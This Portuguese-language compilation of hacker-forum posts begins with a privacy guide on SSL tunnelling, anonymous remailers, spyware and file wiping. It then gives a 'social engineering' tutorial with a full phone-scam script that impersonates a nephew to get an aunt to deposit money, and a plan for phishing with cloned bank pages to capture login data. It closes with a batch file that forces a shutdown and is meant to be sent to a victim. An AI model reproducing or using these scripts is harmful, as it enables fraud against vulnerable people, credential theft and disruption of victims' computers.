A RSA coloca a vantagem de um comprimento mais longo de criptografia muito claramente: porque criptografia de 40 bits é considerada relativamente fraca. 128 bits tem cerca de 309 septilhões de vezes (309,485,000,000,000,000,000,000,000) maior do que 40-bits. Isto significaria que seria necessário muitas vezes mais de tempo para rachar ou quebrar a criptografia de 128 bits do que seria de 40 bits.

Se você quiser mais informações sobre os aspectos técnicos ou os mecanismo de criptografia SSL, visite seu site: www.rsasecurity.com/standards/ssl/.

- E como faço para implementar um SSL Tunnelling?

Sabemos que um Secure Socket Layer é seguro, mas o que não sabem é o que é um túnel. Na forma mais simples, um túnel é um proxy. Como o voto para procuração nas eleições gerais, um túnel irá retransmitir seus dados e trazer para você. Você pode estar ciente que já existem proxies. Tunnelling é feito através de proxies, mas não é considerado como sendo o mesmo.

Agora, se somarmos essa capacidade de Túnel de dados, todos os dados, em um tubo, para o Secure Sockets Layer, temos uma conexão fechada que é independente do software transportando-o.

- Então, como posso proteger as minhas conexões com SSL Tunnelling?

Para o Windows, a primeira parada seria http://www.totalrc.net. Este é um programa de túneis SSL que transforma uma conexão normal meias do proxy em uma conexão SSL.

A segunda parada, para Windows e Unix é stunnel. Stunnel é um kit GNU desenvolvido para encapsulamento SSL de qualquer conexão. Ele está disponível para download como compilação e binário aqui: mike.daewoo.com.pl/computer/stunnel

=== 8. Anonymous Remailers ===

Remailers são programas acessíveis na Internet via e-mail e Usenet para postar anonimamente (ou seja, o destinatário não pode determinar quem enviou o e-mail ou o artigo). Desta forma, o remetente não pode ser rastreado por cabeçalhos de roteamento incluídas no e-mail. Há diferentes classes de remailers, que permitem troca de e-mail anônimo e postagem anônima para USENET e muitas outras funcionalidades úteis.

Uma cadeia é um script de encadeamento remailer menu-driven:

www.obscura.com/crypto.html

Os cypherpunks remailers estão sendo desenvolvidos para fornecer um meio seguro de garantir o anonimato nas redes. Aqui você pode descobrir mais sobre os remailers disponíveis, aqueles que têm sido padrão na existência por um longo tempo, bem como os novos remailers experimentais e servidores anônimos.

www.csua.berkeley.edu/cypherpunks/remailer/

=== 9. Spyware ===

Como todos nós trabalhamos duro para tornar-se mais esclarecido sobre a proteção de nossas informações pessoais e se manter o mais anônimo possível na web, empresas de publicidade estão trabalhando tão duro para chegar a novas maneiras de obter nossas informações pessoais. Uma das maneiras que conseguir isso é através de spyware.

Spyware são os aplicativos que são empacotados junto com muitos programas que você baixa gratuitamente. Sua função é coletar informações pessoais sobre você e retransmiti-lo de volta para empresas de publicidade. A informação é então usada tanto para oferecer-lhe produtos ou vendida a outros anunciantes, para que eles possam promover seus produtos. Eles afirmam isso é tudo o que eles fazem com essa informação, mas o problema é que ninguém realmente sabe ao certo.

Spyware se encaixa na definição clássica de um trojan, pois é algo que você não negocia para mais quando você concordou em fazer o download do produto. Não só é uma invasão de privacidade, mas (especialmente se você tiver alguns tipos diferentes em sua máquina) também pode mastigar sua largura de banda, tornando a sua ligação à Internet mais lento.

Às vezes, esses espiões são realmente inofensivos, simplesmente conectando de volta para o servidor em casa para entregar para você mais publicidade. Alguns, como Gator por exemplo, enviar informações detalhadas sobre seus hábitos de navegação, sistema operacional, renda, idade demográfica etc.

Evitando spyware

Evitar spyware é cada vez mais difícil, à medida que mais distribuidores de software estão escolhendo-o como um método de lucrar com distribuições freeware e shareware. Ser suspeitoso de programas com ícones bonitos e pequenos como Gator. Além disso, assistir os wannabes Napster como AudioGalaxy, Limewire, e Kazaa. Eu ainda tenho que encontrar um que não incluem spyware. Antes de baixar, verifique se o programa é conhecido por conter spyware.

Para obter uma lista de spyware mais conhecido, o melhor que eu encontrei é aqui:

www.infoforce.qc.ca/spyware/enknownlistfrm.html

Livrando-se de spyware

Na maioria dos casos, você pode remover o spyware de seu sistema e ainda usar o aplicativo que você baixou. No caso de Gator e Comet Cursor, todo o programa é um spyware que deve ser completamente removido para evitar a espionagem.

Existem várias maneiras de se livrar de spyware no seu sistema. Você pode usar um firewall para monitorar as conexões de saída. Os programadores que colocarm essas coisas em conjunto, estão ficando mais "furtivos" sobre a obtenção de dados para contornar os firewalls. Comet Cursor, por exemplo utiliza um comando HTTP POST para conectar sem a intervenção de um firewall. Você também pode instalar um monitor de registro como Regmon para monitorar seu registro em indesejadas alterações mas isso não é infalível.

Provavelmente, o melhor método de remoção é baixar um programa de remoção de spyware e executá-lo como se fosse um antivírus. Os melhores exemplos destes programas são:

Adaware de Lavasoft. Disponível em http://www.lavasoftusa.com/ ou OptOut de cybernut profissional Steve Gibson. Disponível em: http://grc.com/optout.htm Ambos os programas são gratuitos e são atualizados regularmente.

Aqui estão alguns links, se você quiser saber mais sobre spyware:

www.spychecker.com
grc.com/optout.htm

=== 10. Faixas de limpeza ===

Burnt Cookies - permite a detecção automática e exclusão opcional de Cookies depositados por web-sites

SurfSecret - elimina automaticamente seus arquivos de cache, cookies, histórico, arquivos temporários, documentos recentes, e os conteúdos da Lixeira.

Nota: Uma sidenote em trilhas de limpeza. Quando você exclui alguns arquivos na sua máquina, estes não são realmente excluídos. Apenas a referência à sua localização no disco rígido é excluído, o que faz com que o seu sistema operacional pense que esses locais no HD está livre e pronto para assumir as coisas. Assim, existem formas de recuperar dados mesmo depois de apagá-las.

Há, no entanto, várias maneiras de limpar esta informação. Programas que enchem locais no disco rígido com zeros, então com 1s, em várias passagens são sua melhor aposta para garantir que nenhum documento vaze para mãos erradas. Um desses programas é o PGP. O PHPi agora vem com um utilitário que faz este trabalho, e você ainda pode selecionar o número de passes para limpar arquivos. Para todos os Unix, há também o programa "wipe". Use-os quando você sentir que tem dados que precisam de uma limpeza segura.


Créditos: http://forum.anonymousbrasil.com/index.php/topic,7620.0.html

Engenharia Social - Entenda

O que é Engenharia Social?

"Engenharia Social, e o ato de enganhar alguem para que a pessoa lhe faça algo que não faria normalmente, deixando um sistema vuneravel ou lhe dando acesso ao mesmo alem de lhe fornecer alguma informação de suma importancia que em suas mãos ou de outras Empresas/Pessoas poderia resultar em grandes perdas, mas principalmente um Engenheiro social aplica o golpe e a dita vitima nunca vai se dar conta que foi enganada"

- Não levem ao pé da letra, é a minha explicação.


Eu diria que a engenharia social é uma arte, pois envolve vários processos e necessita de uma certa experiencia (e por experiencia não digo tempo), ao mesmo tempo que é complexa também é simples, assim que se compreende sua lógica não se torna um grande desafio, porem cada caso é um caso.

Tudo isso vai depender do X da questão. Para quer você vai usar, assim fica mais facil direcionar o aprendizado, seu objetivo é Espionagem Industrial? - è um conteudo diferenciado -
No caso aqui como será um Tópico simples vou estar apenas abordando algumas coisas simples, só o conceito caso alguem queira algo mais "Aprofundado" pode me manda um MP ou sei lá =P.


Scamer ou Engenheiro Social?

A uma grande diferença entre Scamer, Estelenionatários e os Engenheiros Sociais, principalmente pelas áreas de atuação, os Engenheiros geralmente atuam no "ramo" de Empresas, sendo contratados pelas concorrentes ou são Free Lancers atrás de um dinehiro facil (Um variação para o carding), Enfim, um Scamer nunca vai ser um engenheiro, porem um engenheiro sempre vai ser um scamer, complicado né? digamos que o scamer é a parte mais baixa da piramide, eles na maioria são pessoas que quererm dinheiro facil sem estudar (Tipico), e aplicar golpes parece ser uma coisa facil igual o "Golpe da Tia" Rs. (Vou deixar um exemplo no final de "golpe da tia"), Assim como em algumas orgs (não convem dizer). Eles são calda - Mas como assim "calda", não era golpe agora é calda que porra é essa? tá mais sem sentido que Hora de Aventura -

Enfim vamos usar a analogia de um peixe, suponhamos que esse peixe se regenere porque ele tem alguma coisa especial na cabeça.
- Like aquele peixe do Simpsons - O Filme o da radiação, wharever

Efim se ele perder a calda, aquilo que faz ele nadar, ele consiguiria sobreviver? - Sim
Por quê? - Porque ele se regenera derr..

Ok..

E se ele perdesse a cabeça? - Morreria na Hora.

No caso dos Scamers eles são a calda, se eles cairem ou forem pegos não tem muito alarde nem grandes perdas (salvo alguns casos), então ninguem se importa muito com eles, geralmente não são Gênios e se utilizam de tecnicas batidas pra conseguir algum dinheiro.

- Mas cara se eles são tão ruins assim como as pessoas caem, nos golpes? -

Simples sempre vai existir alguem mais burro e mais inteligente que você, nessa caso, existem muitas pessoas burras - Rs. desculpa mais é a realidade.
Mesmo que essas pessoas não fossem tão burras assim, o ser humano tem extintos e geralmente é inevitavel seguilos explorando isso conseguimos aquilo que queremos deles, isso é um pouco de psicologia.

Existem algumas coisas que seduzem e geralmente fazem as pessoas cairem em golpes estupidos que você vê na TV e fala, como a pessoa caiu nisso?

Vamos fazer um Pequeno Rank.

1° Sexy Appel - Apele para o Sexo, e a pessoa para de pensar, e age igual um animal (Não literamente em alguns casos). [Funciona muito com homens]
2° Solidariedade - Sim a Solidariedade está antes da Ganância por incrivel que parece nós ajudamos as pessoas, mas deixo claro que em alguns casos é querendo algo em troca, então use 2 ° e 3 ° juntos.
3° Ganância - Falou em Dinheiro Amigo tem gente que faz tudo,pra ganhar 10 reais a mais - é serio -, a proposta de ganhar dinheiro facil seduz.

Ainda há mais alguns outros porem como o tópico já esta ficando muito estenso vou abordar apenas esses. OK?

Vamos lá.

Exemplo de Golpe

1° Sex Appel - Email de Alguma menina bonita, com um trojan, ou acesso a algum video de uma famosa ou famoso, propostas indecentes que são absurdas como uma panicat dando em cima de um cara com barriguinha de cerveja - sim ele vai cair -, Enfim pornografia em geral, com malwae, trojans, ou sites clonados dão muito certo.

2° Solidariedade - Tem varios exemplo vou usar o da Tia (como disse que faria), porem em um ambiente empresarial a situação muda, mas a ideia de poder ajudar um colega com problemas e bem tentador, e quando esse "colega" é um cargo a cima, a esperança de ser reconhecido com uma promoção faz as pessoas fazerem aquilo que você pedir [Leve em consideração, que você nem trabalha na empresa].

Personagens : Tia "Maria" Golpista "Sobrinho Claudio" - Let's Go !

#Telefone Toca a Tia Atende.

Tia : Aló
Golpista : Aló tia tudo bom?

#Nessa hora a tia vai tentar lembrar de alguem, porque ela tem sobinhos

Tia : é o Claudio?

#Pronto, agora você não Precisa chutar um nome e talvez errar, assuma o papel do claudio

Golpista : Sim tia é o claudio, como a senhora tá?
Tia: Eu to bem... E sua mãe seu pai, etc..

#Pergunta sobre a familia inteira, nem confirme nem negue, se ela pergunta se sua mãe volto de viagem [exemplo] diz que não sabe, e aplica o golpe logo

Golpista : Não sei se volto não tia... sabe por que? meu carro quebro e eu tava viajando, e eu to na estrada e não sei porque não caiu o dinheiro na minha conta, eu to aqui no posto porque o cara reboco o carro pra mim..

#Nessa hora ela vai se impressionar, se quiser pode usar o contexto de um acidente funciona melhor [Agora se a tia odiar o sobrinho ferro!]

Tia: Meu Deus claudio..

#Antes dela fala você continua

Golpista: Tia.. não queria pedir pra senhora mas não tem como me depositar um dinheiro só pra pagar o reboque, porque ele reboco mais eu não paguei ele.

#Fale o valor, faça um voz triste

Golpista: Desculpa pedir, mas é uma emergência.

#Nessa hora ele vai se sensibilizar com sua Historia e provavelmente vai dizer que sim, então acelere

Golpista: Tia anota minha conta, que eu fiz outra, que a bateria ta acabando,*Chinga o Celular pela pouca bateria*, anota ai...[Diz a conta que quer a trasnferencia]

#Agradece e diz que a ligação tá ruim e a bateria e desliga, ela vai sair pra depositar, se possivel de um prazo para ela fazer tal deposito, assim enfatiza a urgência.

-| Esse golpe é uma encenação, não me responsabilizo se alguem aplicar o mesmo, todo o material aqui é de caráter educativo | --

3° Ganância - Apele para dinheiro sortei ou faça com que a pessoa pense que perdeu dinheiro, exemplo um email fake do banco da pessoa, falando que fizeram uma compra no nome dela e pedindo pra entrar no link a baixo para confirmar ou cancelar a compra, a pessoa vai acessar na hora, faça uma pagina clonada do banco da pessoa, assim que ela digitar os dados, eles são enviados pra você.

Como conseguir esses dados?

Bom ai cada um faz do seu jeito, faça seus teste e pense como seria, como você faria ou como agiria em uma situação dessas...

Um Bom engenheiro social não deixa brechas não tem como você desconfiar aplique seu golpes de modo rapido, quando a pessoa menos espera, seja convincente..

Peço desculpas pelo conteudo que ficou um pouco extenso e talvez não tenha respondido a todas as duvidas, porem isso é um introdução ainda vou fazer mais tópicos e talvez libere alguns golpes em pdf para vocês com todas as respostas possiveis e como agir e etc..

enfim se for entrar nesse mundo seja um Engenheiro seja inteligente, Estude Um pouco de psicologia, postura corporal, tom de voz e etc... qualquer duvida podem me mandar um MP ou postar aqui no tópico, se o tópico ficou vago só em dizer que tento explicar da melhor maneira possivel.


"A melhor mentira e aquela que você mesmo acredita, porque ela se torna verdade"

*A Maioria dos golpes são feitos pela internet, então estude um pouco de hacking*

-// Perdão Por algum erro de português, porem ficou muito grande e escrevi com pouco tempo \\-

Como Criar Um Víruz Falso

Como Criar Um Vírus Falso

Abra o bloco de notas. O bloco de notas lhepermitirá digitar textos com praticamente nenhuma formatação. Clique em iniciar -> Todos os programas -> Acessórios -> Bloco de notas

Se você estiver em um Mac, utilize o TextEdit.

Crie um pequeno arquivo batch. Insira o seguinte em seu arquivo de texto:

@echo off
echo hahahaha eu estou hackeando o seu computador
shutdown -s -f -t 60 -c "digite a mensagem que você queira que seja apresentada"

Clique em "arquivo" e, em seguida, em "Salvar Como".

Mude a extensão do arquivo de .txt para .bat ou .cmd

Mude de "Documentos de texto" para "Todos os arquivos".

Salva e agora envie o arquivo para vitima.